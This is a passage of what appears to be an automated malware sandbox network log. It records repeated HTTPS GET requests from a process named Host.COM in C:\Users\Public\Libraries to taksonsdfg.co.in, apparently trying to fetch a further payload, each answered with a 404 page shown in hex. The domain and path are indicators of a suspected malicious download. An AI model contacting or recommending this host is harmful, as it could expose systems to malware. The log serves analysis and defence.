                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:57 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.2.449807108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:58 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:58 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:58 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:58 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:58 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.2.449809108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:59 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:59 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:59 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:59 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:59 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    37192.168.2.449811108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:01 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:01 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:01 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:01 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:01 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    38192.168.2.449813108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:02 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:02 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:02 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:02 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:02 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.2.449816108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:03 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:03 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:03 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:03 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:03 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.2.449823108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:04 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:04 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:04 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:04 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:04 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.2.449830108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:05 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:05 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:05 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:05 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:05 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
